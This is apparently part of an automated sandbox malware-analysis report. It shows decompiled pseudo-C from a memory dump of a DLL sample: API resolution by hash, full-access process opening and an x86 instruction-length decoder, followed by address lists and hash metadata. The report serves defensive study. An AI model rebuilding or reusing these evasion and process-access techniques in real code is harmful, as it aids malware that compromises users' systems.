											 *((intOrPtr*)(_t439 + 0x4c - 0x14)) =  *((intOrPtr*)(_t439 + 0x4c - 0x14)) + 1;
											E6E88CDE0(_t439 + 0x4c, __eflags);
											_t437 = _t437 + 1;
											__eflags = _t437 -  *(_t439 + 0x74);
											if(_t437 <  *(_t439 + 0x74)) {
												continue;
											}
											_t411 = 0;
											__eflags = 0;
											do {
												E6E88F558( *((intOrPtr*)(_t439 + 8)), _t411 * 4);
												E6E88F558(_t439 + 0x40, _t411 * 4);
												_t439 = _t439 + 0xffffffd8;
												asm("cdq");
												asm("pxor xmm5, xmm5");
												asm("movd xmm1, dword [ebp]");
												asm("movd xmm4, dword [edi]");
												asm("movd xmm0, edx");
												asm("cdq");
												asm("punpckldq xmm1, xmm0");
												asm("movq xmm2, [ebx+0x38]");
												asm("movq [esp], xmm1");
												asm("movd xmm3, edx");
												asm("punpckldq xmm4, xmm3");
												asm("movq [esp+0x8], xmm2");
												asm("movq [esp+0x10], xmm4");
												asm("movq [esp+0x18], xmm5");
												asm("movq [esp+0x20], xmm5");
												E6E88AD04(__eflags);
												_t411 = _t411 + 1;
												__eflags = _t411 -  *(_t439 + 0x74);
											} while (_t411 <  *(_t439 + 0x74));
											goto L57;
										}
										break;
									}
									_t392 = _t439 + 0x68;
									 *_t409(0xffffffff,  *((intOrPtr*)(_t439 + 0x60)),  *_t308, _t439 + 0x68, 0, 0, 2);
									__eflags = 0;
									if(0 != 0) {
										break;
									}
									goto L51;
								}
								E6E88CDE0(_t439 + 0x4c, __eflags);
								goto L62;
							}
							_t402 = _t308[1];
							__eflags = _t402;
							if(_t402 <= 0) {
								goto L46;
							}
							_t412 = 0;
							__eflags = 0;
							while(1) {
								_t429 = _t412 * 4;
								_t392 =  *(E6E88F558( *((intOrPtr*)(_t439 + 4)), _t429));
								__eflags = _t392 - _t308[0xd];
								if(_t392 == _t308[0xd]) {
									break;
								}
								_t412 = _t412 + 1;
								__eflags = _t412 - _t402;
								if(_t412 < _t402) {
									continue;
								}
								goto L46;
							}
							__eflags = _t412 - 0xffffffff;
							if(_t412 != 0xffffffff) {
								_t228 = E6E88F568( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t228 - _t429;
								if(_t228 > _t429) {
									_t392 = 4 + _t412 * 4;
									 *(_t439 + 0x6c) = _t392;
									_t251 = E6E88F568( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t251 -  *(_t439 + 0x6c);
									if(_t251 >  *(_t439 + 0x6c)) {
										 *((intOrPtr*)(_t439 + 0x90)) = E6E88F558( *((intOrPtr*)(_t439 + 8)), _t429);
										 *((intOrPtr*)(_t439 + 0x8c)) = E6E88F558( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x6c));
										E6E89382C( *((intOrPtr*)(_t439 + 0x98)),  *((intOrPtr*)(_t439 + 0x90)), E6E88F568( *((intOrPtr*)(_t439 + 4))) -  *(_t439 + 0x6c));
										_t439 = _t439 + 0xc;
									}
									E6E88F8C4( *((intOrPtr*)(_t439 + 8)), E6E88F568( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t74 =  &(_t308[7]);
									 *_t74 = _t308[7] - 1;
									__eflags =  *_t74;
								}
								_t229 = E6E88F568( *_t439);
								__eflags = _t229 - _t429;
								if(_t229 > _t429) {
									_t413 = 4 + _t412 * 4;
									_t242 = E6E88F568( *_t439);
									__eflags = _t242 - _t413;
									if(_t242 > _t413) {
										_t243 = E6E88F558( *((intOrPtr*)(_t439 + 4)), _t429);
										 *((intOrPtr*)(_t439 + 0x94)) = E6E88F558( *((intOrPtr*)(_t439 + 4)), _t413);
										E6E89382C(_t243,  *((intOrPtr*)(_t439 + 0x98)), E6E88F568( *_t439) - _t413);
										_t439 = _t439 + 0xc;
									}
									E6E88F8C4( *((intOrPtr*)(_t439 + 4)), E6E88F568( *_t439) + 0xfffffffc);
									_t79 =  &(_t308[1]);
									 *_t79 = _t308[1] - 1;
									__eflags =  *_t79;
								}
								E6E88F8C4( *((intOrPtr*)(_t439 + 8)), E6E88F568( *((intOrPtr*)(_t439 + 4))) + 4);
								 *(E6E88F558( *((intOrPtr*)(_t439 + 8)), E6E88F568( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t308[0xc];
								_t308[7] = _t308[7] + 1;
								E6E88F8C4( *((intOrPtr*)(_t439 + 4)), E6E88F568( *_t439) + 4);
								 *(E6E88F558( *((intOrPtr*)(_t439 + 4)), E6E88F568( *_t439) + 0xfffffffc)) = _t308[0xd];
								_t308[1] = _t308[1] + 1;
							}
							goto L46;
						}
						_t433 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x70) = _t433 * 4;
							_t403 = E6E88F558(_t439 + 0x28, _t433 * 4);
							_t392 = _t308[1];
							 *(_t439 + 0x80) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L29:
								_t414 = E6E892F8C(0x4bcc7cba, 0x997e6547);
								__eflags = _t414;
								if(_t414 != 0) {
									_t416 =  *_t414(0x1fffff, 0,  *((intOrPtr*)(E6E88F558(_t439 + 0x28,  *(_t439 + 0x70)))));
									__eflags = _t416;
									if(_t416 != 0) {
										E6E88F8C4( *((intOrPtr*)(_t439 + 8)), E6E88F568( *((intOrPtr*)(_t439 + 4))) + 4);
										 *(E6E88F558( *((intOrPtr*)(_t439 + 8)), E6E88F568( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t416;
										_t308[7] = _t308[7] + 1;
										_t271 = E6E88F558(_t439 + 0x28,  *(_t439 + 0x70));
										E6E88F8C4( *((intOrPtr*)(_t439 + 4)), E6E88F568( *_t439) + 4);
										 *(E6E88F558( *((intOrPtr*)(_t439 + 4)), E6E88F568( *_t439) + 0xfffffffc)) =  *_t271;
										_t57 =  &(_t308[1]);
										 *_t57 = _t308[1] + 1;
										__eflags =  *_t57;
									}
								}
								goto L32;
							}
							_t415 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6E88F558( *((intOrPtr*)(_t439 + 4)), _t415 * 4));
								__eflags = _t392 -  *_t403;
								if(_t392 ==  *_t403) {
									break;
								}
								_t415 = _t415 + 1;
								__eflags = _t415 -  *(_t439 + 0x80);
								if(_t415 <  *(_t439 + 0x80)) {
									continue;
								}
								goto L29;
							}
							__eflags = _t415 - 0xffffffff;
							if(_t415 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t433 = _t433 + 1;
							__eflags = _t433 -  *(_t439 + 0x20);
						} while (_t433 <  *(_t439 + 0x20));
						goto L33;
					} else {
						_t434 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x64) = _t434 * 4;
							_t404 = E6E88F558( *((intOrPtr*)(_t439 + 4)), _t434 * 4);
							_t392 =  *(_t439 + 0x20);
							 *(_t439 + 0x7c) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L11:
								_t282 = E6E88F568( *_t439);
								__eflags = _t282 -  *(_t439 + 0x64);
								if(_t282 >  *(_t439 + 0x64)) {
									_t420 = 4 + _t434 * 4;
									_t296 = E6E88F568( *_t439);
									__eflags = _t296 - _t420;
									if(_t296 > _t420) {
										 *((intOrPtr*)(_t439 + 0x9c)) = E6E88F558( *((intOrPtr*)(_t439 + 4)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0x98)) = E6E88F558( *((intOrPtr*)(_t439 + 4)), _t420);
										E6E89382C( *((intOrPtr*)(_t439 + 0xa4)),  *((intOrPtr*)(_t439 + 0x9c)), E6E88F568( *_t439) - _t420);
										_t439 = _t439 + 0xc;
									}
									E6E88F8C4( *((intOrPtr*)(_t439 + 4)), E6E88F568( *_t439) + 0xfffffffc);
									_t22 =  &(_t308[1]);
									 *_t22 = _t308[1] - 1;
									__eflags =  *_t22;
								}
								_t419 = E6E892F8C(0xa5eabdf8, 0x2c2324e8);
								__eflags = _t419;
								if(_t419 != 0) {
									 *_t419( *((intOrPtr*)(E6E88F558( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64)))));
								}
								_t284 = E6E88F568( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t284 -  *(_t439 + 0x64);
								if(_t284 >  *(_t439 + 0x64)) {
									_t422 = 4 + _t434 * 4;
									_t285 = E6E88F568( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t285 - _t422;
									if(_t285 > _t422) {
										 *((intOrPtr*)(_t439 + 0xa4)) = E6E88F558( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0xa0)) = E6E88F558( *((intOrPtr*)(_t439 + 8)), _t422);
										E6E89382C( *((intOrPtr*)(_t439 + 0xac)),  *((intOrPtr*)(_t439 + 0xa4)), E6E88F568( *((intOrPtr*)(_t439 + 4))) - _t422);
										_t439 = _t439 + 0xc;
									}
									E6E88F8C4( *((intOrPtr*)(_t439 + 8)), E6E88F568( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t33 =  &(_t308[7]);
									 *_t33 = _t308[7] - 1;
									__eflags =  *_t33;
								}
								_t434 = _t434 - 1;
								__eflags = _t434;
								goto L20;
							}
							_t421 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6E88F558(_t439 + 0x28, _t421 * 4));
								__eflags = _t392 -  *_t404;
								if(_t392 ==  *_t404) {
									break;
								}
								_t421 = _t421 + 1;
								__eflags = _t421 -  *(_t439 + 0x7c);
								if(_t421 <  *(_t439 + 0x7c)) {
									continue;
								}
								goto L11;
							}
							__eflags = _t421 - 0xffffffff;
							if(_t421 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t434 = _t434 + 1;
							__eflags = _t434 - _t308[1];
						} while (_t434 < _t308[1]);
						goto L21;
					}
				}
			}

0x6e88a5ae
0x6e88a5b0
0x6e88a5bb
0x6e88a5c1
0x6e88a5c5
0x6e88a5ca
0x6e88a5d0
0x6e88a5e0
0x00000000
0x6e88a5e2
0x6e88a5e2
0x6e88a5ed
0x6e88a5ed
0x6e88ab6b
0x6e88ab6d
0x6e88ab6e
0x6e88abad
0x6e88abb1
0x6e88abbf
0x6e88abcd
0x6e88abcd
0x6e88abb8
0x6e88abd3
0x6e88abd8
0x00000000
0x6e88abd8
0x6e88abbc
0x6e88abbd
0x00000000
0x6e88a5f7
0x6e88a5f7
0x6e88a5fb
0x6e88a702
0x6e88a702
0x6e88a707
0x6e88a818
0x6e88a81c
0x6e88a821
0x6e88a825
0x6e88a94f
0x6e88a951
0x6e88a955
0x6e88a95e
0x6e88a967
0x6e88a96b
0x6e88a974
0x6e88a97b
0x6e88a97c
0x6e88a980
0x6e88a984
0x6e88a988
0x6e88a98a
0x6e88aaf4
0x6e88aaf4
0x6e88aafc
0x6e88ab14
0x6e88ab16
0x6e88ab18
0x6e88ab52
0x6e88ab52
0x6e88ab54
0x6e88ab54
0x6e88ab57
0x6e88ab72
0x6e88ab86
0x6e88ab89
0x6e88ab8e
0x6e88ab99
0x6e88ab9a
0x6e88ab9d
0x6e88ab9f
0x6e88aba8
0x00000000
0x6e88aba8
0x6e88ab59
0x6e88ab5d
0x6e88ab66
0x00000000
0x6e88ab66
0x6e88ab29
0x6e88ab39
0x6e88ab3d
0x6e88ab3d
0x6e88ab40
0x6e88ab43
0x6e88ab46
0x6e88ab4c
0x00000000
0x00000000
0x00000000
0x6e88ab4e
0x6e88a992
0x6e88a992
0x6e88a994
0x6e88a998
0x6e88a99d
0x6e88a99f
0x6e88a9a3
0x6e88a9a6
0x6e88a9ae
0x6e88a9b0
0x00000000
0x00000000
0x6e88a9c7
0x6e88a9e2
0x6e88a9e4
0x6e88a9f7
0x6e88a9f9
0x6e88a9fb
0x6e88aa16
0x6e88aa16
0x6e88aa1a
0x6e88aa1c
0x00000000
0x00000000
0x6e88aa1e
0x6e88aa21
0x6e88aa42
0x6e88aa61
0x6e88aa67
0x6e88aa6a
0x6e88aa6f
0x6e88aa70
0x6e88aa74
0x00000000
0x00000000
0x6e88aa7c
0x6e88aa7c
0x6e88aa7e
0x6e88aa8a
0x6e88aa96
0x6e88aaa0
0x6e88aaa3
0x6e88aaa6
0x6e88aaaa
0x6e88aab1
0x6e88aab5
0x6e88aab9
0x6e88aaba
0x6e88aabe
0x6e88aac3
0x6e88aac8
0x6e88aacc
0x6e88aad0
0x6e88aad6
0x6e88aadc
0x6e88aae2
0x6e88aae8
0x6e88aaed
0x6e88aaee
0x6e88aaee
0x00000000
0x6e88aa7e
0x00000000
0x6e88aa21
0x6e88a9ff
0x6e88aa10
0x6e88aa12
0x6e88aa14
0x00000000
0x00000000
0x00000000
0x6e88aa14
0x6e88aa27
0x00000000
0x6e88aa27
0x6e88a82b
0x6e88a82e
0x6e88a830
0x00000000
0x00000000
0x6e88a838
0x6e88a838
0x6e88a83a
0x6e88a83a
0x6e88a84b
0x6e88a84d
0x6e88a850
0x00000000
0x00000000
0x6e88a946
0x6e88a947
0x6e88a949
0x00000000
0x00000000
0x00000000
0x6e88a949
0x6e88a856
0x6e88a859
0x6e88a863
0x6e88a868
0x6e88a86a
0x6e88a870
0x6e88a877
0x6e88a87b
0x6e88a880
0x6e88a884
0x6e88acbf
0x6e88acd3
0x6e88acf6
0x6e88acfb
0x6e88acfb
0x6e88a89b
0x6e88a8a0
0x6e88a8a0
0x6e88a8a0
0x6e88a8a0
0x6e88a8a6
0x6e88a8ab
0x6e88a8ad
0x6e88a8b2
0x6e88a8b9
0x6e88a8be
0x6e88a8c0
0x6e88ac7d
0x6e88ac8e
0x6e88aca8
0x6e88acad
0x6e88acad
0x6e88a8d6
0x6e88a8db
0x6e88a8db
0x6e88a8db
0x6e88a8db
0x6e88a8ef
0x6e88a90d
0x6e88a912
0x6e88a922
0x6e88a93f
0x6e88a941
0x6e88a941
0x00000000
0x6e88a859
0x6e88a70f
0x6e88a70f
0x6e88a711
0x6e88a718
0x6e88a726
0x6e88a728
0x6e88a72b
0x6e88a732
0x6e88a734
0x6e88a765
0x6e88a774
0x6e88a776
0x6e88a778
0x6e88a796
0x6e88a798
0x6e88a79a
0x6e88a7ad
0x6e88a7cc
0x6e88a7d2
0x6e88a7d5
0x6e88a7ec
0x6e88a808
0x6e88a80a
0x6e88a80a
0x6e88a80a
0x6e88a80a
0x6e88a79a
0x00000000
0x6e88a778
0x6e88a738
0x6e88a738
0x6e88a73a
0x6e88a74b
0x6e88a74d
0x6e88a74f
0x00000000
0x00000000
0x6e88a75b
0x6e88a75c
0x6e88a763
0x00000000
0x00000000
0x00000000
0x6e88a763
0x6e88a751
0x6e88a754
0x00000000
0x00000000
0x6e88a80d
0x6e88a80d
0x6e88a80e
0x6e88a80e
0x00000000
0x6e88a601
0x6e88a603
0x6e88a603
0x6e88a605
0x6e88a60c
0x6e88a61a
0x6e88a61c
0x6e88a620
0x6e88a624
0x6e88a626
0x6e88a654
0x6e88a657
0x6e88a65c
0x6e88a660
0x6e88a665
0x6e88a66c
0x6e88a671
0x6e88a673
0x6e88ac3a
0x6e88ac4b
0x6e88ac6b
0x6e88ac70
0x6e88ac70
0x6e88a689
0x6e88a68e
0x6e88a68e
0x6e88a68e
0x6e88a68e
0x6e88a6a0
0x6e88a6a2
0x6e88a6a4
0x6e88a6b5
0x6e88a6b5
0x6e88a6bb
0x6e88a6c0
0x6e88a6c4
0x6e88a6ca
0x6e88a6d1
0x6e88a6d6
0x6e88a6d8
0x6e88abee
0x6e88abff
0x6e88ac20
0x6e88ac25
0x6e88ac25
0x6e88a6ef
0x6e88a6f4
0x6e88a6f4
0x6e88a6f4
0x6e88a6f4
0x6e88a6f7
0x6e88a6f7
0x00000000
0x6e88a6f7
0x6e88a62a
0x6e88a62a
0x6e88a62c
0x6e88a63d
0x6e88a63f
0x6e88a641
0x00000000
0x00000000
0x6e88a64d
0x6e88a64e
0x6e88a652
0x00000000
0x00000000
0x00000000
0x6e88a652
0x6e88a643
0x6e88a646
0x00000000
0x00000000
0x6e88a6f8
0x6e88a6f8
0x6e88a6f9
0x6e88a6f9
0x00000000
0x6e88a605
0x6e88a5fb

Strings

, xrefs: 6E88ABB3

Memory Dump Source

Source File: 00000002.00000002.494850916.000000006E881000.00000020.00020000.sdmp, Offset: 6E880000, based on PE: true

Associated: 00000002.00000002.494843808.000000006E880000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494920728.000000006E89A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494930657.000000006E89D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.494950242.000000006E89F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: c846a206c496fd71f51ba4c4cfd129534121518ec13d51594e0ce3aee2dcd463
Instruction ID: 20e4cb3b5f238c3bb8e7d9adcc0dcb6f688ae89f6a9ddd4f653ffee4c2f90dab
Opcode Fuzzy Hash: c846a206c496fd71f51ba4c4cfd129534121518ec13d51594e0ce3aee2dcd463
Instruction Fuzzy Hash: 7C1261715086099FC754DFA8C880A9FB7B9BF95714F204E59ECA9972E0EB30ED01CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6E8992DC, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E6E8992DC(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				signed int _t250;
				signed char _t251;
				signed char* _t254;
				char _t255;
				signed short _t256;
				char _t257;
				signed short _t260;
				signed int _t261;
				signed int _t262;
				void* _t264;
				void* _t272;
				void* _t273;
				signed short* _t274;
				signed char _t275;
				signed int _t277;
				signed int _t278;
				void* _t282;
				signed int _t288;
				unsigned int _t290;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				unsigned int _t296;
				unsigned int _t297;
				signed int _t299;
				unsigned int _t301;
				signed char _t302;
				signed int _t304;
				signed char _t307;
				signed char _t308;
				signed int _t309;
				void* _t312;
				void* _t313;
				signed int _t314;
				signed int _t316;
				signed int _t319;
				signed int _t321;
				signed int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				unsigned int* _t346;
				unsigned int _t354;
				signed int _t355;
				void* _t357;
				signed int _t364;
				signed int _t366;
				signed int _t383;
				signed int _t388;
				signed int _t391;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t403;
				signed int _t408;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t417;
				signed int _t419;
				signed int _t424;
				void* _t426;
				signed int* _t427;

				 *((intOrPtr*)(_t426 + 0x24)) = __edx;
				 *((intOrPtr*)(_t426 + 0x10)) = __ecx;
				 *((intOrPtr*)(_t426 + 0x14)) = __ecx;
				_t274 =  *(_t426 + 0x48);
				E6E8935D4( *(_t426 + 0x48), 0, 0x1c);
				_t427 = _t426 + 0xc;
				_t338 = 0;
				_t282 = 0x10;
				do {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					if(_t250 == 0xf3) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000004;
						L17:
						_t338 = _t339 & 0x000000ff;
						 *(_t383 + 1) = _t250;
						goto L18;
					}
					if(_t250 == 0xf2) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000002;
						goto L17;
					}
					if(_t250 == 0xf0) {
						_t338 = (_t338 | 0x00000020) & 0x000000ff;
						 *(_t427[0x10] + 2) = _t250;
						goto L18;
					}
					if(_t250 == 0x26 || _t250 == 0x2e || _t250 == 0x36 || _t250 == 0x3e) {
						L13:
						_t338 = (_t338 | 0x00000040) & 0x000000ff;
						 *(_t427[0x10] + 3) = _t250;
					} else {
						_t6 = _t250 - 0x64; // -100
						if(_t6 <= 1) {
							goto L13;
						}
						if(_t250 == 0x66) {
							_t338 = (_t338 | 0x00000008) & 0x000000ff;
							 *(_t427[0x10] + 4) = _t250;
							goto L18;
						}
						if(_t250 != 0x67) {
							break;
						} else {
							_t338 = _t338 | 0x00000010;
							 *(_t427[0x10] + 5) = _t250;
							goto L18;
						}
					}
					L18:
					_t282 = _t282 + 0xff;
				} while (_t282 != 0);
				_t388 = _t427[0x10];
				_t285 =  !=  ? _t338 : 1;
				_t343 = _t338 << 0x17;
				 *(_t388 + 6) = _t250;
				 *_t427 =  !=  ? _t338 : 1;
				 *(_t388 + 0x18) = _t343;
				if(_t250 == 0xf) {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					_t427[5] = _t250;
					 *(_t427[0x10] + 7) = _t250;
					_t427[2] = _t427[4] + 0x4a;
				} else {
					_t22 = _t250 - 0xa0; // -160
					_t427[5] =  *(_t427[0x10] + 7) & 0x000000ff;
					if(_t22 <= 3) {
						_t424 =  *_t427;
						_t382 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
						 *_t427 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
					}
				}
				_t354 = _t250 >> 2;
				_t391 = _t250 & 0x00000003;
				_t345 = _t427[2];
				_t427[3] = _t391;
				_t427[6] = _t354;
				_t288 =  *(( *(_t354 + _t345) & 0x000000ff) + _t391 + _t345) & 0x000000ff;
				_t427[1] = _t288;
				if(_t288 == 0xff) {
					_t343 = _t343 + 0x3000;
					_t288 = 0 | (_t250 & 0xfffffffd) == 0x00000024;
					 *(_t427[0x10] + 0x18) = _t343;
					_t427[1] = _t288;
				}
				if((_t427[1] & 0x00000080) != 0) {
					_t290 =  *((_t288 & 0x0000007f) + _t345) & 0x0000ffff;
					_t427[1] = _t290;
					_t395 = _t290 >> 8;
				} else {
					_t395 = 0;
				}
				if(_t427[5] != 0 && ( *_t427 &  *(( *(_t427[6] + _t427[4] + 0x130) & 0x000000ff) + _t427[3] + _t427[4] + 0x130) & 0x000000ff) != 0) {
					_t343 = _t343 | 0x00003000;
					 *(_t427[0x10] + 0x18) = _t343;
				}
				if((_t427[1] & 0x00000001) == 0) {
					if(( *_t427 & 0x00000020) != 0) {
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					goto L114;
				} else {
					_t355 = _t427[0x10];
					_t343 = _t343 | 0x00000001;
					 *(_t355 + 0x18) = _t343;
					_t296 =  *_t274 & 0x000000ff;
					_t346 =  &(_t427[6]);
					 *_t346 = _t296;
					 *(_t355 + 8) = _t296;
					_t297 = _t296 >> 6;
					_t427[3] = _t297;
					 *(_t355 + 9) = _t297;
					_t299 =  *_t346 & 0x00000007;
					_t427[7] = _t299;
					 *(_t355 + 0xb) = _t299;
					_t301 =  *_t346 & 0x0000003f;
					 *_t346 = _t301;
					_t302 = _t301 >> 3;
					_t427[2] = _t302;
					 *(_t355 + 0xa) = _t302;
					if(_t395 != 0 && (_t395 << _t302 & 0x00000080) != 0) {
						_t343 = _t343 | 0x00003000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					if(_t427[5] == 0) {
						_t80 = _t250 - 0xd9; // -217
						if(_t80 <= 6) {
							_t81 = _t250 + 0x27; // 0x27
							_t417 = _t81 & 0x000000ff;
							if(_t427[3] != 3) {
								_t419 = ( *(_t417 + _t427[4] + 0xf1) & 0x000000ff) << _t427[2];
							} else {
								_t419 = ( *(_t427[4] + _t427[2] + 0xf8 + _t417 * 8) & 0x000000ff) << _t427[7];
							}
							if((_t419 & 0x00000080) != 0) {
								_t343 = _t343 | 0x00003000;
								 *(_t427[0x10] + 0x18) = _t343;
							}
						}
					}
					if(( *_t427 & 0x00000020) == 0) {
						L52:
						if(_t427[5] == 0) {
							if(_t250 == 0x8c) {
								L85:
								if(_t427[2] <= 5) {
									L87:
									_t427[5] = _t274[0];
									_t427[4] =  &(_t274[1]);
									if(_t427[2] <= 1) {
										if(_t250 != 0xf6) {
											_t309 = _t427[1];
											_t310 =  ==  ? _t309 | 0xffffff90 : _t309;
											_t427[1] =  ==  ? _t309 | 0xffffff90 : _t309;
										} else {
											_t427[1] = _t427[1] | 0xffffff82;
										}
									}
									if(_t427[3] == 0) {
										if(( *_t427 & 0x00000010) == 0) {
											_t264 = 4;
											_t357 =  ==  ? _t264 : 0;
										} else {
											_t273 = 2;
											_t357 =  ==  ? _t273 : 0;
										}
									} else {
										if(_t427[3] == 1) {
											_t357 = 1;
										} else {
											if(_t427[3] == 2) {
												_t357 = (( !( *_t427) & 0x00000010) >> 3) + 2;
											} else {
												_t357 = 0;
											}
										}
									}
									if(_t427[3] != 3 && _t427[7] == 4 && ( *_t427 & 0x00000010) == 0) {
										_t307 = _t427[5];
										_t343 = _t343 | 0x00000002;
										_t403 = _t427[0x10];
										_t427[4] =  &(_t274[1]);
										 *(_t403 + 0xc) = _t307;
										_t308 = _t307 & 0x00000007;
										 *(_t403 + 0x18) = _t343;
										 *(_t403 + 0xd) = _t307 >> 6;
										 *(_t403 + 0xe) = (_t307 & 0x0000003f) >> 3;
										 *(_t403 + 0xf) = _t308;
										if(_t308 == 5) {
											_t272 = 4;
											_t357 =  ==  ? _t272 : _t357;
										}
									}
									if(_t357 == 1) {
										_t304 = _t427[0x10];
										_t343 = _t343 | 0x00000020;
										 *(_t304 + 0x18) = _t343;
										 *((char*)(_t304 + 0x14)) =  *(_t427[4] - 1);
									} else {
										if(_t357 == 2) {
											_t277 = _t427[0x10];
											_t343 = _t343 | 0x00000040;
											 *(_t277 + 0x18) = _t343;
											 *((short*)(_t277 + 0x14)) =  *(_t427[4] - 1) & 0x0000ffff;
										} else {
											if(_t357 == 4) {
												_t278 = _t427[0x10];
												_t343 = _t343 | 0x00000080;
												 *(_t278 + 0x18) = _t343;
												 *(_t278 + 0x14) =  *(_t427[4] - 1);
											}
										}
									}
									_t195 = _t427[4] - 1; // -1
									_t274 = _t357 + _t195;
									L114:
									_t251 = _t427[1];
									_t292 = _t251 & 0x00000040;
									if((_t251 & 0x00000010) == 0) {
										L121:
										if((_t427[1] & 0x00000004) == 0) {
											L129:
											if((_t427[1] & 0x00000002) != 0) {
												_t396 = _t427[0x10];
												_t343 = _t343 | 0x00000004;
												 *(_t396 + 0x18) = _t343;
												_t257 =  *_t274;
												_t274 =  &(_t274[0]);
												 *((char*)(_t396 + 0x10)) = _t257;
											}
											if(_t292 == 0) {
												if((_t427[1] & 0x00000020) != 0) {
													_t293 = _t427[0x10];
													_t343 = _t343 | 0x00000104;
													 *(_t293 + 0x18) = _t343;
													_t255 =  *_t274;
													_t274 =  &(_t274[0]);
													 *((char*)(_t293 + 0x10)) = _t255;
												}
												goto L135;
											} else {
												L132:
												_t294 = _t427[0x10];
												_t343 = _t343 | 0x00000110;
												 *(_t294 + 0x18) = _t343;
												_t256 =  *_t274;
												_t274 =  &(_t274[2]);
												 *(_t294 + 0x10) = _t256;
												L135:
												_t275 = _t274 - _t427[0xf];
												if(_t275 <= 0xf) {
													 *(_t427[0x10]) = _t275;
												} else {
													_t254 = _t427[0x10];
													_t275 = 0xf;
													_t254[0x18] = _t343 | 0x00005000;
													 *_t254 = _t275;
												}
												return _t275 & 0x000000ff;
											}
										}
										if((_t343 & 0x00000010) == 0) {
											if((_t343 & 0x00000008) == 0) {
												_t397 = _t427[0x10];
												_t343 = _t343 | 0x00000008;
												 *(_t397 + 0x18) = _t343;
												 *((short*)(_t397 + 0x10)) =  *_t274 & 0x0000ffff;
												L128:
												_t274 =  &(_t274[1]);
												goto L129;
											}
											_t398 = _t427[0x10];
											_t343 = _t343 | 0x00000800;
											L126:
											 *(_t398 + 0x18) = _t343;
											 *((short*)(_t398 + 0x14)) =  *_t274 & 0x0000ffff;
											goto L128;
										}
										_t398 = _t427[0x10];
										_t343 = _t343 | 0x00000008;
										goto L126;
									}
									if(_t292 == 0) {
										if(( *_t427 & 0x00000008) == 0) {
											_t399 = _t427[0x10];
											_t343 = _t343 | 0x00000010;
											 *(_t399 + 0x18) = _t343;
											_t260 =  *_t274;
											_t274 =  &(_t274[2]);
											 *(_t399 + 0x10) = _t260;
										} else {
											_t400 = _t427[0x10];
											_t343 = _t343 | 0x00000008;
											 *(_t400 + 0x18) = _t343;
											_t261 =  *_t274 & 0x0000ffff;
											_t274 =  &(_t274[1]);
											 *(_t400 + 0x10) = _t261;
										}
										goto L121;
									}
									if(( *_t427 & 0x00000008) == 0) {
										goto L132;
									}
									_t295 = _t427[0x10];
									_t343 = _t343 | 0x00000108;
									 *(_t295 + 0x18) = _t343;
									_t262 =  *_t274 & 0x0000ffff;
									_t274 =  &(_t274[1]);
									 *(_t295 + 0x10) = _t262;
									goto L135;
								}
								L86:
								_t343 = _t343 | 0x00011000;
								 *(_t427[0x10] + 0x18) = _t343;
								goto L87;
							}
							if(_t250 != 0x8e) {
								L66:
								if(_t427[3] != 3) {
									if(_t427[5] == 0) {
										goto L87;
									}
									if(_t250 == 0xd7 || _t250 == 0xf7) {
										L83:
										if(( *_t427 & 0x00000009) != 0) {
											goto L86;
										}
									} else {
										if(_t250 == 0xd6) {
											if(( *_t427 & 0x00000006) != 0) {
												goto L86;
											}
											goto L87;
										}
										if(_t250 == 0xc5) {
											goto L86;
										}
										if(_t250 == 0x50) {
											goto L83;
										}
									}
									goto L87;
								}
								_t364 = _t427[4];
								_t312 = _t364 + 0x1da;
								_t366 =  !=  ? _t312 : _t364 + 0x1cb;
								_t313 =  !=  ? _t427[9] + _t364 : _t312;
								_t427[4] = _t366;
								if(_t366 == _t313) {
									goto L87;
								} else {
									goto L68;
								}
								while(1) {
									L68:
									_t408 = _t427[4];
									if(_t250 ==  *_t408) {
										break;
									}
									_t411 = _t408 + 3;
									_t427[4] = _t411;
									if(_t411 != _t313) {
										continue;
									}
									goto L87;
								}
								_t314 = _t408;
								if(( *_t427 &  *(_t314 + 1) & 0x000000ff) == 0) {
									goto L87;
								}
